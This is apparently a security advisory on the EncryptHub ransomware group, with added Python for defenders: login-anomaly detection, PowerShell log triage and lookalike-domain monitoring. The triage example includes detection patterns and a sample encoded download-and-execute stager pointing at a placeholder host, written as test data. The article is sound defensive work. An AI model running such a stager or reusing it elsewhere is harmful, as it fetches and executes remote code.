What happened?
On 26 February, cybersecurity firm Prodaft published a report on the cybercrime threat group known as "EncryptHub" or "Larva-208". The group has been active since at least June 2024, launching attacks against several hundred victim organisations resulting in the theft and encryption of data.
The group reportedly employs SMS phishing, voice phishing and fake login pages that mimic well-known VPN services such as Cisco AnyConnect, Palo Alto GlobalProtect, and Microsoft 365 to deceive their victims. Once they gain access, EncryptHub installs Remote Monitoring and Management (RMM) software to maintain control, and deploys a range of malware, including information stealers and ransomware.
As is commonplace in financially motivated cyberattacks, there are indications that the group may act as initial access brokers or affiliates, working on behalf of other groups. According to the detailed report, EncryptHub is linked to other notorious groups like RansomHub and BlackSuit. Their attacks are characterised by the use of custom PowerShell scripts and a unique PowerShell-based ransomware encryptor, which encrypts files and demands ransom payments in the USDT cryptocurrency via Telegram.
So what?
Every day is a school day in the world of cybersecurity, so understanding the specific and general tactics of groups such as this is critical to ensure that businesses are prioritising defences to address the most likely paths to attacks.
EncryptHub's primary attack vector is email phishing, making it essential for organisations to bolster their defences against this common vector. Email filtering systems, continuous monitoring for unusual logins and employee awareness are key.
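One concrete form of the "monitoring for unusual logins" recommended above is a per-user baseline check. The Python below is an added example, not code from the original article or from Prodaft: it builds a baseline of (country, network ASN) pairs from historical successful sign-ins, then flags new successful logins that come from a country the user has never used, from a new network in a known country, or directly after a burst of failed attempts. The field names (user, ts, country, asn, result) and all events are constructed for illustration and assume a generic identity-provider sign-in log.

```python
"""Flag sign-ins that deviate from a per-user baseline (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta


def build_baseline(history):
    """Map each user to the set of (country, asn) pairs seen in successful logins."""
    baseline = defaultdict(set)
    for ev in history:
        if ev["result"] == "success":
            baseline[ev["user"]].add((ev["country"], ev["asn"]))
    return baseline


def flag_unusual_logins(events, baseline,
                        max_fail_window=timedelta(minutes=10), fail_threshold=5):
    """Return (user, timestamp, reasons) for each successful login that looks unusual."""
    alerts = []
    recent_failures = defaultdict(list)       # user -> timestamps of failed attempts
    window_minutes = int(max_fail_window.total_seconds() // 60)
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        user = ev["user"]
        if ev["result"] != "success":
            recent_failures[user].append(ts)
            continue
        reasons = []
        seen = baseline.get(user, set())
        if (ev["country"], ev["asn"]) not in seen:
            if ev["country"] not in {country for country, _ in seen}:
                reasons.append(f"first login from country {ev['country']}")
            else:
                reasons.append(f"new network ASN {ev['asn']} in known country {ev['country']}")
        # A success preceded by many failures is a classic sign of a guessed or phished credential.
        fails = [t for t in recent_failures[user] if ts - t <= max_fail_window]
        if len(fails) >= fail_threshold:
            reasons.append(f"{len(fails)} failed attempts within {window_minutes} minutes before success")
        recent_failures[user] = []             # reset the failure window after a success
        if reasons:
            alerts.append((user, ev["ts"], reasons))
    return alerts


# Constructed sample data: two users with a short history, then a day of new events.
HISTORY = [
    {"user": "alice", "ts": "2025-02-20T08:55:00+00:00", "country": "GB", "asn": 12345, "result": "success"},
    {"user": "alice", "ts": "2025-02-21T09:02:00+00:00", "country": "GB", "asn": 12345, "result": "success"},
    {"user": "bob", "ts": "2025-02-20T10:00:00+00:00", "country": "GB", "asn": 12345, "result": "success"},
    {"user": "bob", "ts": "2025-02-22T15:30:00+00:00", "country": "US", "asn": 67890, "result": "success"},
]
NEW_EVENTS = [
    {"user": "alice", "ts": "2025-02-26T08:58:00+00:00", "country": "GB", "asn": 12345, "result": "success"},
    {"user": "alice", "ts": "2025-02-26T11:14:00+00:00", "country": "NL", "asn": 99999, "result": "success"},
    *[{"user": "bob", "ts": f"2025-02-26T12:0{i}:00+00:00", "country": "US", "asn": 67890, "result": "failure"}
      for i in range(5)],
    {"user": "bob", "ts": "2025-02-26T12:06:00+00:00", "country": "US", "asn": 67890, "result": "success"},
    {"user": "bob", "ts": "2025-02-27T09:00:00+00:00", "country": "GB", "asn": 54321, "result": "success"},
]

if __name__ == "__main__":
    for user, ts, reasons in flag_unusual_logins(NEW_EVENTS, build_baseline(HISTORY)):
        print(user, ts, "; ".join(reasons))
```

Running it yields three alerts: alice's first sign-in from NL, bob's success after five failures, and bob's sign-in from a new network in a country he has used before. The baseline should be rebuilt from a rolling window so that legitimate travel stops firing once it has been reviewed.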
Similarly, making phishing-resistant multi-factor authentication the default is critical. This means hardware or app-based authenticators rather than SMS codes, which can be easily overcome.
Because EncryptHub, like many similar groups, relies on PowerShell and other automated scripts to achieve its goals, organisations are advised to enable script monitoring across their networks and to disable PowerShell wherever it is not required for business functionality.
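Script monitoring only helps if someone looks at what it records. The Python below is an added example, not code from the original article or from Prodaft, showing how a defender might triage Windows PowerShell script block log events (Event ID 4104) once they have been exported from the event log. It decodes any -EncodedCommand payload so that indicators hidden inside base64 are scanned too, and raises an alert only when several weak indicators coincide. The events, the field names (EventID, Computer, User, ScriptBlockText) and the example.invalid URLs are all constructed for illustration.

```python
"""Triage PowerShell script block log events (Event ID 4104) (added example)."""
import base64
import re

# Heuristic indicators of malicious PowerShell use. Each alone is weak evidence;
# triage() requires several to coincide before raising an alert.
INDICATORS = {
    "encoded_command": re.compile(r"-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-(?:executionpolicy|ep|ex)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|curl)\b.*https?://", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
}


def decode_encoded_command(text):
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})", text, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return the sorted list of indicator names matched by one event,
    scanning both the raw script block and any decoded -EncodedCommand payload."""
    text = event["ScriptBlockText"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + "\n" + decoded
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def triage(events, min_hits=2):
    """Return an alert for every 4104 event matching at least min_hits indicators."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        hits = score_event(ev)
        if len(hits) >= min_hits:
            alerts.append({"Computer": ev["Computer"], "User": ev["User"], "indicators": hits})
    return alerts


# Constructed sample: a benign block, a classic encoded download cradle,
# a single-indicator admin task, and an event of a different ID that is ignored.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS01", "User": "CORP\\jdoe",
     "ScriptBlockText": "Get-Service | Where-Object { $_.Status -eq 'Running' }"},
    {"EventID": 4104, "Computer": "WS02", "User": "CORP\\asmith",
     "ScriptBlockText": f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}"},
    {"EventID": 4104, "Computer": "SRV01", "User": "CORP\\svc_backup",
     "ScriptBlockText": "Invoke-WebRequest -Uri https://updates.example.invalid/manifest.json "
                        "-OutFile C:\\Temp\\m.json"},
    {"EventID": 4103, "Computer": "WS02", "User": "CORP\\asmith",
     "ScriptBlockText": "Write-Host 'pipeline'"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Only the encoded download cradle on WS02 is alerted; the backup job on SRV01 matches one indicator and stays below the threshold, which is the point of scoring rather than matching single strings. Script block logging must be enabled by policy before 4104 events exist to triage, and the threshold and patterns should be tuned against an organisation's own administrative scripts.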
EncryptHub uses multiple domains to conduct phishing attacks. Organisations should consider monitoring for newly registered domains which mimic their brands. In addition, companies should have a pre-prepared incident response plan and team in place to react to detection or compromise.
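Monitoring for newly registered domains that mimic a brand can be automated by generating the lookalike labels an attacker is likely to register and matching a registration feed against them. The Python below is an added example, not code from the original article or from Prodaft. The brand acme-corp, the owned-domain list and the mock feed are constructed; in practice the feed would come from zone-file diffs or a newly-registered-domain service. It generates ASCII lookalikes (omitted, transposed, doubled or substituted characters, hyphen removal, and common login/VPN affixes) and reports why each feed entry was flagged.

```python
"""Match newly registered domains against lookalikes of a brand (added example)."""

# ASCII-only character substitutions that read like the original at a glance.
HOMOGLYPHS = {
    "a": ["4"], "e": ["3"], "i": ["1", "l"], "l": ["1", "i"],
    "o": ["0"], "s": ["5"], "m": ["rn", "n"], "n": ["m"],
}
# Words phishing pages for VPN or SSO portals are commonly combined with a brand name.
AFFIXES = ("login", "vpn", "sso", "portal", "secure", "mfa")


def lookalike_variants(brand):
    """Return the set of labels a registrant might choose to impersonate `brand`."""
    variants = set()
    n = len(brand)
    for i in range(n):                                   # omitted character
        variants.add(brand[:i] + brand[i + 1:])
    for i in range(n - 1):                               # transposed neighbours
        variants.add(brand[:i] + brand[i + 1] + brand[i] + brand[i + 2:])
    for i in range(n):                                   # doubled character
        variants.add(brand[:i + 1] + brand[i] + brand[i + 1:])
    for i, ch in enumerate(brand):                       # one homoglyph substitution
        for sub in HOMOGLYPHS.get(ch, ()):
            variants.add(brand[:i] + sub + brand[i + 1:])
    variants.add(brand.replace("-", ""))                 # hyphen dropped
    for affix in AFFIXES:                                # brand combined with a portal word
        variants.update({f"{brand}-{affix}", f"{affix}-{brand}", brand + affix, affix + brand})
    variants.discard(brand)
    return variants


def classify(domain, brand, own_domains, variants):
    """Return a reason string if `domain` looks like a brand impersonation, else None.
    Assumes the brand is the leftmost label; owned domains are never flagged."""
    if domain in own_domains:
        return None
    label = domain.split(".")[0]
    if label == brand:
        return "brand name on an unowned domain"
    if label in variants:
        return "lookalike variant"
    if brand in label or brand.replace("-", "") in label:
        return "contains brand name"
    return None


def scan_feed(feed, brand, own_domains):
    """Return (domain, reason) pairs for every flagged entry in the feed."""
    variants = lookalike_variants(brand)
    flagged = []
    for domain in feed:
        reason = classify(domain, brand, own_domains, variants)
        if reason:
            flagged.append((domain, reason))
    return flagged


# Constructed inputs.
BRAND = "acme-corp"
OWN_DOMAINS = {"acme-corp.com", "acme-corp.co.uk"}
NEW_DOMAIN_FEED = [
    "acme-corp.co.uk", "acme-corp-login.com", "acmecorp.net", "acrne-corp.com",
    "acme-c0rp.co", "acme-corp.support", "myacme-corp-help.org", "bakery-supplies.com",
]

if __name__ == "__main__":
    for domain, reason in scan_feed(NEW_DOMAIN_FEED, BRAND, OWN_DOMAINS):
        print(f"{domain:28} {reason}")
```

Six of the eight feed entries are flagged; the organisation's own acme-corp.co.uk and the unrelated bakery are not. Flagged domains are candidates for review and takedown requests, and the same variant set can be loaded into mail and web filters as a block list.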
To hunt effectively for threats like EncryptHub, network defenders can draw on Prodaft's Larva-208 report, which provides valuable insight into EncryptHub's tactics, techniques, and procedures (TTPs). It can be accessed here.